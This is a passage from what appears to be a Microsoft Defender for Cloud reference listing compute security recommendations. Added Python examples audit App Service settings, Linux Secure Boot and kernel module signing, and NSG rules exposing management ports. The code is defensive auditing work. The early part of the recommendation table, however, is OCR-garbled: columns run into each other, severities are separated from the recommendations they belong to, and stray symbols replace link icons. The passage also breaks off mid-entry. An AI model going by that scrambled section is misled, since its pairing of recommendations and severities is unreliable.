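The configuration-level App Service recommendations above (HTTPS only, latest TLS, CORS, FTPS, remote debugging, client certificates, managed identity), applied to a site definition so the failing ones come back with the table's severities. This is an added example, not Defender for Cloud's or Azure Policy's own code: the input mirrors the shape of an ARM Microsoft.Web/sites resource (kind, identity.type, properties.httpsOnly, properties.clientCertEnabled, properties.siteConfig.*), the two sample sites are constructed, and treating TLS 1.2 as the latest version and FtpsOnly/Disabled as "FTPS enforced" are assumptions.

```python
"""Audit an App Service site against the AppServices recommendations above.

Added example, not Defender for Cloud's own code. The input mirrors the shape of
an ARM Microsoft.Web/sites resource (kind, identity.type, properties.httpsOnly,
properties.clientCertEnabled, properties.siteConfig.*); the two sample sites
below are constructed for this illustration.
"""
from typing import Dict, List, Tuple

Finding = Tuple[str, str]  # (recommendation, severity), as in the table above

# Assumption: the related policies treat TLS 1.2 as the latest version and
# accept either FTPS-only or FTP fully disabled as "FTPS enforced".
LATEST_TLS = "1.2"
FTPS_ENFORCED_STATES = {"FtpsOnly", "Disabled"}

# Severity ranking for sorting findings, highest first.
_SEVERITY_RANK = {"High": 0, "Medium": 1, "Low": 2}

# Noun used in the recommendation titles for each App Service kind.
_KIND_NOUN = {"api": "API App", "functionapp": "Function App", "app": "Web Application"}


def audit_app_service(site: Dict) -> List[Finding]:
    """Return the recommendations this site would trigger, highest severity first."""
    props = site.get("properties", {})
    cfg = props.get("siteConfig", {})
    # kind may carry suffixes such as "functionapp,linux"; the first token names the app type.
    noun = _KIND_NOUN.get(site.get("kind", "app").split(",")[0], "Web Application")
    findings: List[Finding] = []

    # Transport security: HTTPS only and the latest TLS version.
    if not props.get("httpsOnly", False):
        findings.append((f"{noun} should only be accessible over HTTPS", "Medium"))
    if cfg.get("minTlsVersion", "1.0") != LATEST_TLS:
        findings.append((f"TLS should be updated to the latest version for {noun}", "High"))

    # CORS: a wildcard origin lets every web origin call the app.
    if "*" in cfg.get("cors", {}).get("allowedOrigins", []):
        findings.append((f"CORS should not allow every resource to access {noun}", "Low"))

    # Deployment and debugging channels that open extra inbound paths.
    if cfg.get("ftpsState", "AllAllowed") not in FTPS_ENFORCED_STATES:
        findings.append((f"FTPS should be required in {noun}", "High"))
    if cfg.get("remoteDebuggingEnabled", False):
        findings.append((f"Remote debugging should be turned off for {noun}", "Low"))

    # Client authentication and the app's own identity.
    if not props.get("clientCertEnabled", False):
        findings.append((f"{noun} should have Client Certificates (Incoming client certificates) enabled", "Medium"))
    if site.get("identity", {}).get("type", "None") == "None":
        findings.append((f"Managed identity should be used in {noun}", "Medium"))

    findings.sort(key=lambda f: _SEVERITY_RANK[f[1]])
    return findings


# Constructed sample: a function app with every audited setting left at its weak value.
WEAK_SITE = {
    "name": "contoso-func-weak",
    "kind": "functionapp,linux",
    "identity": {"type": "None"},
    "properties": {
        "httpsOnly": False,
        "clientCertEnabled": False,
        "siteConfig": {
            "minTlsVersion": "1.0",
            "ftpsState": "AllAllowed",
            "remoteDebuggingEnabled": True,
            "cors": {"allowedOrigins": ["*"]},
        },
    },
}

# Constructed sample: the same app after remediating each recommendation.
HARDENED_SITE = {
    "name": "contoso-func-hardened",
    "kind": "functionapp,linux",
    "identity": {"type": "SystemAssigned"},
    "properties": {
        "httpsOnly": True,
        "clientCertEnabled": True,
        "siteConfig": {
            "minTlsVersion": "1.2",
            "ftpsState": "FtpsOnly",
            "remoteDebuggingEnabled": False,
            "cors": {"allowedOrigins": ["https://portal.contoso.example"]},
        },
    },
}

if __name__ == "__main__":
    for site in (WEAK_SITE, HARDENED_SITE):
        print(site["name"])
        for rec, sev in audit_app_service(site) or [("no findings", "-")]:
            print(f"  [{sev}] {rec}")
```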


Compute recommendations 


There are 58 recommendations in this category. 


Recommendation Description 
Adaptive application Enable application controls to define the list of known-safe 
controls for defining applications running on your machines, and alert you when 


safe applications should other applications run. This helps harden your machines 
against malware. To simplify the process of configuring and 


Severity 


Low 


High 


High 


High 


Medium 


Medium 


Severity 


High 


Recommendation 


be enabled on your 
machines E 


Allowlist rules in your 
adaptive application 
control policy should be 
updated č 


Authentication to Linux 
machines should 
require SSH keys Si 


Automation account 
variables should be 
encrypted 7 


Azure Backup should be 
enabled for virtual 
machines 7 


Container hosts should 
be configured securely 7 


Description 


maintaining your rules, Defender for Cloud uses machine 
learning to analyze the applications running on each 

machine and suggest the list of known-safe applications. 
(Related policy: Adaptive application controls for defining 
safe applications should be enabled on your machines Z) 


Monitor for changes in behavior on groups of machines 
configured for auditing by Defender for Cloud's adaptive 
application controls. Defender for Cloud uses machine 
learning to analyze the running processes on your 
machines and suggest a list of known-safe applications. 
These are presented as recommended apps to allow in 
adaptive application control policies. 

(Related policy: Allowlist rules in your adaptive application 
control policy should be updated £ ) 


Although SSH itself provides an encrypted connection, 
using passwords with SSH still leaves the VM vulnerable to 
brute-force attacks. The most secure option for 
authenticating to an Azure Linux virtual machine over SSH 
is with a public-private key pair, also known as SSH keys. 
Learn more in Detailed steps: Create and manage SSH keys 
for authentication to a Linux VM in Azure. 

(Related policy: Audit Linux machines that are not using 
SSH key for authentication £ ) 


It is important to enable encryption of Automation account 
variable assets when storing sensitive data. 

(Related policy: Automation account variables should be 
encrypted £ ) 


Protect the data on your Azure virtual machines with Azure 
Backup. 

Azure Backup is an Azure-native, cost-effective, data 
protection solution. 

It creates recovery points that are stored in geo-redundant 
recovery vaults. 

When you restore from a recovery point, you can restore 
the whole VM or specific files. 

(Related policy: Azure Backup should be enabled for Virtual 
Machines © ) 


Remediate vulnerabilities in security configuration on 
machines with Docker installed to protect them from 
attacks. 

(Related policy: Vulnerabilities in container security 
configurations should be remediated zi 


Severity 


High 


Medium 


High 


Low 


High 


Recommendation Description Severity 


Diagnostic logs in Azure Enable logs and retain them for up to a year. This enables Low 
Stream Analytics should you to recreate activity trails for investigation purposes 
be enabled 7 when a security incident occurs or your network is 

compromised. 

(Related policy: Diagnostic logs in Azure Stream Analytics 

should be enabled 2) 


Diagnostic logs in Batch Enable logs and retain them for up to a year. This enables Low 
accounts should be you to recreate activity trails for investigation purposes 
enabled £ when a security incident occurs or your network is 


compromised. 
(Related policy: Diagnostic logs in Batch accounts should be 
enabled Z) 


Diagnostic logs in Event Enable logs and retain them for up to a year. This enables Low 
Hub should be enabled £ you to recreate activity trails for investigation purposes 

when a security incident occurs or your network is 

compromised. 

(Related policy: Diagnostic logs in Event Hub should be 

enabled £) 


Diagnostic logs in Logic To ensure you can recreate activity trails for investigation Low 

Apps should be enabled £ purposes when a security incident occurs or your network is 
compromised, enable logging. If your diagnostic logs aren't 
being sent to a Log Analytics workspace, Azure Storage 
account, or Azure Event Hub, ensure you've configured 
diagnostic settings to send platform metrics and platform 
logs to the relevant destinations. Learn more in Create 
diagnostic settings to send platform logs and metrics to 
different destinations. 
(Related policy: Diagnostic logs in Logic Apps should be 
enabled Z) 


Diagnostic logs in Enable logs and retain them for up to a year. This enables Low 
Search services should you to recreate activity trails for investigation purposes 
be enabled 7 when a security incident occurs or your network is 

compromised. 

(Related policy: Diagnostic logs in Search services should be 


enabled Z) 
Diagnostic logs in Enable logs and retain them for up to a year. This enables Low 
Service Bus should be you to recreate activity trails for investigation purposes 
enabled Z when a security incident occurs or your network is 


compromised. 
(Related policy: Diagnostic logs in Service Bus should be 
enabled Z) 


Recommendation: Diagnostic logs in Virtual Machine Scale Sets should be enabled
Severity: Low
Description: Enable logs and retain them for up to a year. This enables you to recreate activity trails for investigation purposes when a security incident occurs or your network is compromised.
(Related policy: Diagnostic logs in Virtual Machine Scale Sets should be enabled)

Recommendation: Endpoint protection health issues on machines should be resolved
Severity: Medium
Description: Resolve endpoint protection health issues on your virtual machines to protect them from the latest threats and vulnerabilities. See the documentation for the endpoint protection solutions supported by Defender for Cloud and the endpoint protection assessments.
(No related policy)

Recommendation: Endpoint protection health issues on virtual machine scale sets should be resolved
Severity: Low
Description: Remediate endpoint protection health failures on your virtual machine scale sets to protect them from threats and vulnerabilities.
(Related policy: Endpoint protection solution should be installed on virtual machine scale sets)

Recommendation: Endpoint protection should be installed on machines
Severity: High
Description: To protect machines from threats and vulnerabilities, install a supported endpoint protection solution. Learn more about how endpoint protection for machines is evaluated in Endpoint protection assessment and recommendations in Microsoft Defender for Cloud.
(No related policy)

Recommendation: Endpoint protection should be installed on virtual machine scale sets
Severity: High
Description: Install an endpoint protection solution on your virtual machine scale sets to protect them from threats and vulnerabilities.
(Related policy: Endpoint protection solution should be installed on virtual machine scale sets)

Recommendation: File integrity monitoring should be enabled on machines
Severity: High
Description: Defender for Cloud has identified machines that are missing a file integrity monitoring solution. To monitor changes to critical files, registry keys, and more on your servers, enable file integrity monitoring. When the file integrity monitoring solution is enabled, create data collection rules to define the files to be monitored. To define rules, or see the files changed on machines with existing rules, go to the file integrity monitoring management page.
(No related policy)

Recommendation: Guest Attestation extension should be installed on supported Linux virtual machine scale sets
Severity: Low
Description: Install Guest Attestation extension on supported Linux virtual machine scale sets to allow Microsoft Defender for Cloud to proactively attest and monitor the boot integrity. Once installed, boot integrity will be attested via Remote Attestation. This assessment only applies to trusted launch enabled Linux virtual machine scale sets.
Important: Trusted launch requires the creation of new virtual machines. You can't enable trusted launch on existing virtual machines that were initially created without it. Learn more about Trusted launch for Azure virtual machines.
(No related policy)


Recommendation: Guest Attestation extension should be installed on supported Linux virtual machines
Severity: Low
Description: Install Guest Attestation extension on supported Linux virtual machines to allow Microsoft Defender for Cloud to proactively attest and monitor the boot integrity. Once installed, boot integrity will be attested via Remote Attestation. This assessment only applies to trusted launch enabled Linux virtual machines.
Important: Trusted launch requires the creation of new virtual machines. You can't enable trusted launch on existing virtual machines that were initially created without it. Learn more about Trusted launch for Azure virtual machines.
(No related policy)

Recommendation: Guest Attestation extension should be installed on supported Windows virtual machine scale sets
Severity: Low
Description: Install Guest Attestation extension on supported virtual machine scale sets to allow Microsoft Defender for Cloud to proactively attest and monitor the boot integrity. Once installed, boot integrity will be attested via Remote Attestation. This assessment only applies to trusted launch enabled virtual machine scale sets.
Important: Trusted launch requires the creation of new virtual machines. You can't enable trusted launch on existing virtual machines that were initially created without it. Learn more about Trusted launch for Azure virtual machines.
(No related policy)

Recommendation: Guest Attestation extension should be installed on supported Windows virtual machines
Severity: Low
Description: Install Guest Attestation extension on supported virtual machines to allow Microsoft Defender for Cloud to proactively attest and monitor the boot integrity. Once installed, boot integrity will be attested via Remote Attestation. This assessment only applies to trusted launch enabled virtual machines.
Important: Trusted launch requires the creation of new virtual machines. You can't enable trusted launch on existing virtual machines that were initially created without it. Learn more about Trusted launch for Azure virtual machines.
(No related policy)


Recommendation: Guest Configuration extension should be installed on machines
Severity: Medium
Description: To ensure secure configurations of in-guest settings of your machine, install the Guest Configuration extension. In-guest settings that the extension monitors include the configuration of the operating system, application configuration or presence, and environment settings. Once installed, in-guest policies will be available such as 'Windows Exploit guard should be enabled'. Learn more.
(Related policy: Virtual machines should have the Guest Configuration extension)

Recommendation: Install endpoint protection solution on virtual machines
Severity: High
Description: Install an endpoint protection solution on your virtual machines, to protect them from threats and vulnerabilities.
(Related policy: Monitor missing Endpoint Protection in Azure Security Center)

Recommendation: Linux virtual machines should enforce kernel module signature validation
Severity: Low
Description: To help mitigate against the execution of malicious or unauthorized code in kernel mode, enforce kernel module signature validation on supported Linux virtual machines. Kernel module signature validation ensures that only trusted kernel modules will be allowed to run. This assessment only applies to Linux virtual machines that have the Azure Monitor Agent installed.
(No related policy)

Recommendation: Linux virtual machines should use only signed and trusted boot components
Severity: Low
Description: With Secure Boot enabled, all OS boot components (boot loader, kernel, kernel drivers) must be signed by trusted publishers. Defender for Cloud has identified untrusted OS boot components on one or more of your Linux machines. To protect your machines from potentially malicious components, add them to your allow list or remove the identified components.
(No related policy)

Recommendation: Linux virtual machines should use Secure Boot
Severity: Low
Description: To protect against the installation of malware-based rootkits and boot kits, enable Secure Boot on supported Linux virtual machines. Secure Boot ensures that only signed operating systems and drivers will be allowed to run. This assessment only applies to Linux virtual machines that have the Azure Monitor Agent installed.
(No related policy)
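The two Linux boot-integrity recommendations above (Secure Boot and kernel module signature validation) are assessed by Defender for Cloud through the Azure Monitor Agent. The following is an added example, not code from the Defender for Cloud documentation or from Microsoft, that reads the same evidence from inside the guest: the UEFI SecureBoot and SetupMode variables exposed through efivarfs, the kernel's module.sig_enforce parameter, and the kernel lockdown mode (the lockdown check goes slightly beyond what the page lists). The sysfs paths and the efivarfs layout are standard Linux interfaces; the sample variable payloads and the wording of the findings are this example's own.

```python
"""Added example (not from the Defender for Cloud docs): in-guest checks for the
Linux 'Secure Boot' and 'kernel module signature validation' recommendations.

Sources read (standard Linux interfaces, not Azure-specific):
  /sys/firmware/efi/efivars/SecureBoot-8be4df61-93ca-11d2-aa0d-00e098032b8c
  /sys/firmware/efi/efivars/SetupMode-8be4df61-93ca-11d2-aa0d-00e098032b8c
  /sys/module/module/parameters/sig_enforce
  /sys/kernel/security/lockdown
"""
from __future__ import annotations

import struct
from pathlib import Path

EFIVARS = Path("/sys/firmware/efi/efivars")
EFI_GLOBAL_GUID = "8be4df61-93ca-11d2-aa0d-00e098032b8c"

# Constructed sample payloads: 4-byte attribute word (0x6 = BS|RT) then one data byte.
EFI_TRUE = b"\x06\x00\x00\x00\x01"
EFI_FALSE = b"\x06\x00\x00\x00\x00"


def parse_efivar(raw: bytes) -> tuple[int, bytes]:
    """efivarfs files are a little-endian u32 attribute word followed by the variable data."""
    if len(raw) < 4:
        raise ValueError("efivar payload shorter than the 4-byte attribute header")
    (attrs,) = struct.unpack("<I", raw[:4])
    return attrs, raw[4:]


def secure_boot_state(secure_boot_raw: bytes | None, setup_mode_raw: bytes | None) -> str:
    """Return 'enforcing', 'setup-mode', 'disabled' or 'no-uefi'.

    SecureBoot == 1 on its own is not enough: a platform in SetupMode (SetupMode == 1)
    accepts new keys without authentication, so the signature chain is not enforced.
    """
    if secure_boot_raw is None:
        return "no-uefi"
    _, sb = parse_efivar(secure_boot_raw)
    if not sb or sb[0] != 1:
        return "disabled"
    if setup_mode_raw is not None:
        _, sm = parse_efivar(setup_mode_raw)
        if sm and sm[0] == 1:
            return "setup-mode"
    return "enforcing"


def module_sig_enforced(sig_enforce_text: str | None) -> bool:
    """/sys/module/module/parameters/sig_enforce is 'Y' when unsigned modules are refused.
    The file is absent (None here) on kernels built without CONFIG_MODULE_SIG."""
    return (sig_enforce_text or "").strip().upper() == "Y"


def lockdown_mode(lockdown_text: str | None) -> str:
    """/sys/kernel/security/lockdown reads like '[none] integrity confidentiality';
    the bracketed token is the active mode."""
    for token in (lockdown_text or "").split():
        if token.startswith("[") and token.endswith("]"):
            return token[1:-1]
    return "unknown"


def assess(secure_boot_raw, setup_mode_raw, sig_enforce_text, lockdown_text) -> list[str]:
    """Findings in the spirit of the two recommendations; an empty list means healthy."""
    findings = []
    sb = secure_boot_state(secure_boot_raw, setup_mode_raw)
    if sb != "enforcing":
        findings.append(f"secure boot not enforcing ({sb})")
    if not module_sig_enforced(sig_enforce_text):
        findings.append("kernel module signature validation not enforced")
    if lockdown_mode(lockdown_text) == "none":
        findings.append("kernel lockdown disabled (unsigned code paths into ring 0 remain open)")
    return findings


def demo() -> dict[str, list[str]]:
    """Run the assessment over constructed evidence for a hardened and a weak guest."""
    return {
        "hardened": assess(EFI_TRUE, EFI_FALSE, "Y\n", "none [integrity] confidentiality\n"),
        "weak": assess(EFI_FALSE, EFI_FALSE, "N\n", "[none] integrity confidentiality\n"),
    }


def _read_bytes(path: Path) -> bytes | None:
    return path.read_bytes() if path.exists() else None


def _read_text(path: Path) -> str | None:
    return path.read_text() if path.exists() else None


if __name__ == "__main__":
    # On a real VM, read the live interfaces; the result mirrors the demo() findings.
    live = assess(
        _read_bytes(EFIVARS / f"SecureBoot-{EFI_GLOBAL_GUID}"),
        _read_bytes(EFIVARS / f"SetupMode-{EFI_GLOBAL_GUID}"),
        _read_text(Path("/sys/module/module/parameters/sig_enforce")),
        _read_text(Path("/sys/kernel/security/lockdown")),
    )
    print("healthy" if not live else "\n".join(live))
```

A VM created without trusted launch reports "no-uefi" or "disabled" here, which is consistent with the note that trusted launch cannot be enabled on an existing VM; the fix is to recreate the VM with trusted launch rather than to flip a guest setting.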


Recommendation: Log Analytics agent should be installed on Linux-based Azure Arc-enabled machines
Severity: High
Description: Defender for Cloud uses the Log Analytics agent (also known as OMS) to collect security events from your Azure Arc machines. To deploy the agent on all your Azure Arc machines, follow the remediation steps.
(No related policy)

Recommendation: Log Analytics agent should be installed on virtual machine scale sets
Severity: High
Description: Defender for Cloud collects data from your Azure virtual machines (VMs) to monitor for security vulnerabilities and threats. Data is collected using the Log Analytics agent, formerly known as the Microsoft Monitoring Agent (MMA), which reads various security-related configurations and event logs from the machine and copies the data to your workspace for analysis. You'll also need to follow that procedure if your VMs are used by an Azure managed service such as Azure Kubernetes Service or Azure Service Fabric. You cannot configure auto-provisioning of the agent for Azure virtual machine scale sets. To deploy the agent on virtual machine scale sets (including those used by Azure managed services such as Azure Kubernetes Service and Azure Service Fabric), follow the procedure in the remediation steps.
(Related policy: Log Analytics agent should be installed on your virtual machine scale sets for Azure Security Center monitoring)

Recommendation: Log Analytics agent should be installed on virtual machines
Severity: High
Description: Defender for Cloud collects data from your Azure virtual machines (VMs) to monitor for security vulnerabilities and threats. Data is collected using the Log Analytics agent, formerly known as the Microsoft Monitoring Agent (MMA), which reads various security-related configurations and event logs from the machine and copies the data to your Log Analytics workspace for analysis. This agent is also required if your VMs are used by an Azure managed service such as Azure Kubernetes Service or Azure Service Fabric. We recommend configuring auto-provisioning to automatically deploy the agent. If you choose not to use auto-provisioning, manually deploy the agent to your VMs using the instructions in the remediation steps.
(Related policy: Log Analytics agent should be installed on your virtual machine for Azure Security Center monitoring)

Recommendation: Log Analytics agent should be installed on Windows-based Azure Arc-enabled machines
Severity: High
Description: Defender for Cloud uses the Log Analytics agent (also known as MMA) to collect security events from your Azure Arc machines. To deploy the agent on all your Azure Arc machines, follow the remediation steps.
(No related policy)


Recommendation: Machines should be configured securely
Severity: Low
Description: Remediate vulnerabilities in security configuration on your machines to protect them from attacks.
(Related policy: Vulnerabilities in security configuration on your machines should be remediated)

Recommendation: Machines should be restarted to apply security configuration updates
Severity: Low
Description: To apply security configuration updates and protect against vulnerabilities, restart your machines. This assessment only applies to Linux virtual machines that have the Azure Monitor Agent installed.
(No related policy)

Recommendation: Machines should have a vulnerability assessment solution
Severity: Medium
Description: Defender for Cloud regularly checks your connected machines to ensure they're running vulnerability assessment tools. Use this recommendation to deploy a vulnerability assessment solution.
(Related policy: A vulnerability assessment solution should be enabled on your virtual machines)

Recommendation: Machines should have vulnerability findings resolved
Severity: Low
Description: Resolve the findings from the vulnerability assessment solutions on your virtual machines.
(Related policy: A vulnerability assessment solution should be enabled on your virtual machines)

Recommendation: Management ports of virtual machines should be protected with just-in-time network access control
Severity: High
Description: Defender for Cloud has identified some overly-permissive inbound rules for management ports in your Network Security Group. Enable just-in-time access control to protect your VM from internet-based brute-force attacks. Learn more in Understanding just-in-time (JIT) VM access.
(Related policy: Management ports of virtual machines should be protected with just-in-time network access control)

Recommendation: Microsoft Defender for servers should be enabled
Severity: High
Description: Microsoft Defender for servers provides real-time threat protection for your server workloads and generates hardening recommendations as well as alerts about suspicious activities. You can use this information to quickly remediate security issues and improve the security of your servers.
Important: Remediating this recommendation will result in charges for protecting your servers. If you don't have any servers in this subscription, no charges will be incurred. If you create any servers on this subscription in the future, they will automatically be protected and charges will begin at that time.
Learn more in Introduction to Microsoft Defender for servers.
(Related policy: Azure Defender for servers should be enabled)
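The just-in-time recommendation above fires when a Network Security Group carries an inbound Allow rule that opens a management port to the Internet. The following is an added example, not code from the Defender for Cloud documentation or from Microsoft, that reproduces that check over an NSG's rule list. It assumes the rules are in the shape of the Resource Manager networkSecurityGroups resource (name, priority, direction, access, protocol, sourceAddressPrefix or sourceAddressPrefixes, destinationPortRange or destinationPortRanges), which is what `az network nsg show` returns; the sample NSG is constructed for the example, and the port list is the set JIT manages by default (22, 3389, 5985, 5986). The walk honours NSG semantics that matter for the verdict: inbound rules are evaluated from the lowest priority number upward, the first match decides, and the platform default rules end in DenyAllInbound, so only an explicit Allow can expose a port.

```python
"""Added example (not from the Defender for Cloud docs): find management ports that an
NSG exposes to the Internet, i.e. the condition behind the JIT recommendation."""
from __future__ import annotations

# Ports JIT manages by default (SSH, RDP, WinRM, WinRM over HTTPS).
MANAGEMENT_PORTS = {22: "SSH", 3389: "RDP", 5985: "WinRM", 5986: "WinRM-HTTPS"}
INTERNET_SOURCES = {"*", "internet", "0.0.0.0/0", "any"}


def _port_ranges(rule: dict) -> list[tuple[int, int]]:
    """Expand destinationPortRange / destinationPortRanges into (lo, hi) pairs."""
    specs = [rule.get("destinationPortRange")] + list(rule.get("destinationPortRanges") or [])
    ranges = []
    for spec in specs:
        if not spec:
            continue
        if spec == "*":
            ranges.append((0, 65535))
        elif "-" in spec:
            lo, hi = spec.split("-", 1)
            ranges.append((int(lo), int(hi)))
        else:
            ranges.append((int(spec), int(spec)))
    return ranges


def _covers_port(rule: dict, port: int) -> bool:
    return any(lo <= port <= hi for lo, hi in _port_ranges(rule))


def _from_internet(rule: dict) -> bool:
    sources = [rule.get("sourceAddressPrefix")] + list(rule.get("sourceAddressPrefixes") or [])
    return any(s and s.lower() in INTERNET_SOURCES for s in sources)


def _protocol_matches(rule: dict) -> bool:
    # Management ports here are all TCP; a UDP-only rule does not expose them.
    return rule.get("protocol", "*").upper() in ("*", "TCP")


def exposed_management_ports(nsg: dict) -> dict[int, str]:
    """Map each management port reachable from the Internet to the rule that opens it.

    Inbound rules are walked in priority order and the first rule matching the port
    and source decides, exactly as the NSG data path does: an earlier Deny shadows a
    later Allow. The implicit DenyAllInbound default rule means no match == closed.
    """
    inbound = sorted(
        (r for r in nsg.get("securityRules", []) if r.get("direction", "").lower() == "inbound"),
        key=lambda r: int(r["priority"]),
    )
    exposed = {}
    for port in MANAGEMENT_PORTS:
        for rule in inbound:
            if not (_covers_port(rule, port) and _from_internet(rule) and _protocol_matches(rule)):
                continue
            if rule["access"].lower() == "allow":
                exposed[port] = rule["name"]
            break  # first matching rule decides, whether Allow or Deny
    return exposed


def jit_candidates(nsg: dict) -> list[str]:
    """Human-readable findings; an empty list means no management port is Internet-exposed."""
    return [f"{MANAGEMENT_PORTS[p]} ({p}) opened by rule '{name}'"
            for p, name in sorted(exposed_management_ports(nsg).items())]


# Constructed sample: an NSG as it often looks before JIT is enabled.
SAMPLE_NSG = {
    "name": "vm-nsg",
    "securityRules": [
        {"name": "deny-rdp-from-internet", "priority": 100, "direction": "Inbound",
         "access": "Deny", "protocol": "*", "sourceAddressPrefix": "Internet",
         "destinationPortRange": "3389"},
        {"name": "allow-ssh-any", "priority": 200, "direction": "Inbound",
         "access": "Allow", "protocol": "Tcp", "sourceAddressPrefix": "*",
         "destinationPortRange": "22"},
        {"name": "allow-mgmt-range", "priority": 300, "direction": "Inbound",
         "access": "Allow", "protocol": "*", "sourceAddressPrefix": "0.0.0.0/0",
         "destinationPortRanges": ["5985-5986", "8080"]},
        {"name": "allow-rdp-from-office", "priority": 400, "direction": "Inbound",
         "access": "Allow", "protocol": "Tcp", "sourceAddressPrefix": "203.0.113.0/24",
         "destinationPortRange": "3389"},
        {"name": "allow-rdp-all", "priority": 500, "direction": "Inbound",
         "access": "Allow", "protocol": "Tcp", "sourceAddressPrefix": "*",
         "destinationPortRange": "3389"},
    ],
}

if __name__ == "__main__":
    for line in jit_candidates(SAMPLE_NSG) or ["no Internet-exposed management ports"]:
        print(line)
```

In the sample, RDP is not reported even though rule `allow-rdp-all` opens it to `*`, because the priority-100 Deny matches first; SSH and both WinRM ports are reported. That ordering is also why a JIT policy works: JIT inserts a time-boxed Allow at a lower priority number (and a Deny behind it) rather than editing your existing rules.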


Recommendation: Microsoft Defender for servers should be enabled on workspaces
Severity: Medium
Description: Microsoft Defender for servers brings threat detection and advanced defenses for your Windows and Linux machines. With this Defender plan enabled on your subscriptions but not on your workspaces, you're paying for the full capability of Microsoft Defender for servers but missing out on some of the benefits. When you enable Microsoft Defender for servers on a workspace, all machines reporting to that workspace will be billed for Microsoft Defender for servers, even if they're in subscriptions without Defender plans enabled. Unless you also enable Microsoft Defender for servers on the subscription, those machines won't be able to take advantage of just-in-time VM access, adaptive application controls, and network detections for Azure resources. Learn more in Introduction to Microsoft Defender for servers.
(No related policy)

Recommendation: Secure Boot should be enabled on supported Windows virtual machines
Severity: Low
Description: Enable Secure Boot on supported Windows virtual machines to mitigate against malicious and unauthorized changes to the boot chain. Once enabled, only trusted bootloaders, kernel and kernel drivers will be allowed to run. This assessment only applies to trusted launch enabled Windows virtual machines.
Important: Trusted launch requires the creation of new virtual machines. You can't enable trusted launch on existing virtual machines that were initially created without it. Learn more about Trusted launch for Azure virtual machines.
(No related policy)

Recommendation: Service Fabric clusters should have the ClusterProtectionLevel property set to EncryptAndSign
Severity: High
Description: Service Fabric provides three levels of protection (None, Sign and EncryptAndSign) for node-to-node communication using a primary cluster certificate. Set the protection level to ensure that all node-to-node messages are encrypted and digitally signed.
(Related policy: Service Fabric clusters should have the ClusterProtectionLevel property set to EncryptAndSign)


Recommendation: Service Fabric clusters should only use Azure Active Directory for client authentication
Severity: High
Description: Perform client authentication only via Azure Active Directory in Service Fabric.
(Related policy: Service Fabric clusters should only use Azure Active Directory for client authentication)

Recommendation: System updates on virtual machine scale sets should be installed
Severity: High
Description: Install missing system security and critical updates to secure your Windows and Linux virtual machine scale sets.
(Related policy: System updates on virtual machine scale sets should be installed)

Recommendation: System updates should be installed on your machines
Severity: High
Description: Install missing system security and critical updates to secure your Windows and Linux virtual machines and computers.
(Related policy: System updates should be installed on your machines)

Recommendation: System updates should be installed on your machines (powered by Update Center)
Severity: High
Description: Your machines are missing system, security, and critical updates. Software updates often include critical patches to security holes. Such holes are frequently exploited in malware attacks so it's vital to keep your software updated. To install all outstanding patches and secure your machines, follow the remediation steps.
(No related policy)

Recommendation: Virtual machine scale sets should be configured securely
Severity: High
Description: Remediate vulnerabilities in security configuration on your virtual machine scale sets to protect them from attacks.
(Related policy: Vulnerabilities in security configuration on your virtual machine scale sets should be remediated)

Recommendation: Virtual machines guest attestation status should be healthy
Severity: Medium
Description: Guest attestation is performed by sending a trusted log (TCGLog) to an attestation server. The server uses these logs to determine whether boot components are trustworthy. This assessment is intended to detect compromises of the boot chain which might be the result of a bootkit or rootkit infection. This assessment only applies to Trusted Launch enabled virtual machines that have the Guest Attestation extension installed.
(No related policy)

Recommendation: Virtual machines' Guest Configuration extension should be deployed with system-assigned managed identity
Severity: Medium
Description: The Guest Configuration extension requires a system assigned managed identity. Azure virtual machines in the scope of this policy will be non-compliant when they have the Guest Configuration extension installed but do not have a system assigned managed identity. Learn more.
(Related policy: Guest Configuration extension should be deployed to Azure virtual machines with system assigned managed identity)


Recommendation: Virtual machines should be migrated to new Azure Resource Manager resources
Severity: High
Description: Virtual Machines (classic) was deprecated and these VMs should be migrated to Azure Resource Manager. Because Azure Resource Manager now has full IaaS capabilities and other advancements, we deprecated the management of IaaS virtual machines (VMs) through Azure Service Manager (ASM) on February 28, 2020. This functionality will be fully retired on March 1, 2023. To view all affected classic VMs make sure to select all your Azure subscriptions under the 'directories + subscriptions' tab.
Available resources and information about this tool and migration:
Overview of Virtual machines (classic) deprecation, step by step process for migration and available Microsoft resources.
Details about the Migrate to Azure Resource Manager migration tool.
Migrate to Azure Resource Manager migration tool using PowerShell.
(Related policy: Virtual machines should be migrated to new Azure Resource Manager resources)

Recommendation: Virtual machines should encrypt temp disks, caches, and data flows between Compute and Storage resources
Severity: High
Description: By default, a virtual machine's OS and data disks are encrypted-at-rest using platform-managed keys; temp disks and data caches aren't encrypted, and data isn't encrypted when flowing between compute and storage resources. For a comparison of different disk encryption technologies in Azure, see https://aka.ms/diskencryptioncomparison. Use Azure Disk Encryption to encrypt all this data. Disregard this recommendation if:
1. You're using the encryption-at-host feature, or
2. Server-side encryption on Managed Disks meets your security requirements.
Learn more in Server-side encryption of Azure Disk Storage.
(Related policy: Disk encryption should be applied on virtual machines)

Recommendation: vTPM should be enabled on supported virtual machines
Severity: Low
Description: Enable virtual TPM device on supported virtual machines to facilitate Measured Boot and other OS security features that require a TPM. Once enabled, vTPM can be used to attest boot integrity. This assessment only applies to trusted launch enabled virtual machines.
Important: Trusted launch requires the creation of new virtual machines. You can't enable trusted launch on existing virtual machines that were initially created without it. Learn more about Trusted launch for Azure virtual machines.
(No related policy)


Recommendation: Vulnerabilities in security configuration on your Linux machines should be remediated (powered by Guest Configuration)
Severity: Low
Description: Remediate vulnerabilities in security configuration on your Linux machines to protect them from attacks.
(Related policy: Linux machines should meet requirements for the Azure security baseline)

Recommendation: Vulnerabilities in security configuration on your Windows machines should be remediated (powered by Guest Configuration)
Severity: Low
Description: Remediate vulnerabilities in security configuration on your Windows machines to protect them from attacks.
(No related policy)

Recommendation: Windows Defender Exploit Guard should be enabled on machines
Severity: Medium
Description: Windows Defender Exploit Guard uses the Azure Policy Guest Configuration agent. Exploit Guard has four components that are designed to lock down devices against a wide variety of attack vectors and block behaviors commonly used in malware attacks while enabling enterprises to balance their security risk and productivity requirements (Windows only).
(Related policy: Audit Windows machines on which Windows Defender Exploit Guard is not enabled)

Recommendation: Windows web servers should be configured to use secure communication protocols
Severity: High
Description: To protect the privacy of information communicated over the Internet, your web servers should use the latest version of the industry-standard cryptographic protocol, Transport Layer Security (TLS). TLS secures communications over a network by using security certificates to encrypt a connection between machines.
(Related policy: Audit Windows web servers that are not using secure communication protocols)

Recommendation: [Preview]: Linux virtual machines should enable Azure Disk Encryption or EncryptionAtHost
Severity: High
